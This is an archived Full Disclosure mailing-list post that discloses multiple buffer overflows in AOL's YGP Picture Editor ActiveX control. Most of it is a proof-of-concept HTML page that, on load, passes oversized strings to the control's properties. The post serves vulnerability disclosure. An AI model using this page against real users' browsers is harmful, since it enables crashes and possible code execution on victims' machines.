Full Disclosure mailing list archives
AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows
From: Elazar Broad <elazarb () earthlink net>
Date: Tue, 25 Dec 2007 18:29:52 -0500 (GMT-05:00)
The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows: ---------------- <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var s = 'A'; while (s.length <= 8175) s = s + 'A'; obj.DisplayName = s; obj.DisplayName = s; obj.FinalSavePath = s; obj.ForceSaveTo = s; obj.HiddenControls = s; obj.InitialEditorScreen = s; obj.Locale = s; obj.Proxy = s; obj.UserAgent = s; } </script> </head> <body onload="JavaScript: return Check();"> <object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309"> </object> </body> </html> ---------------- Happy Holidays to all! Elazar _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows Elazar Broad (Dec 25)
- Re: AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows reepex (Dec 25)
- Re: AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows Valdis . Kletnieks (Dec 25)
- Re: AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows reepex (Dec 25)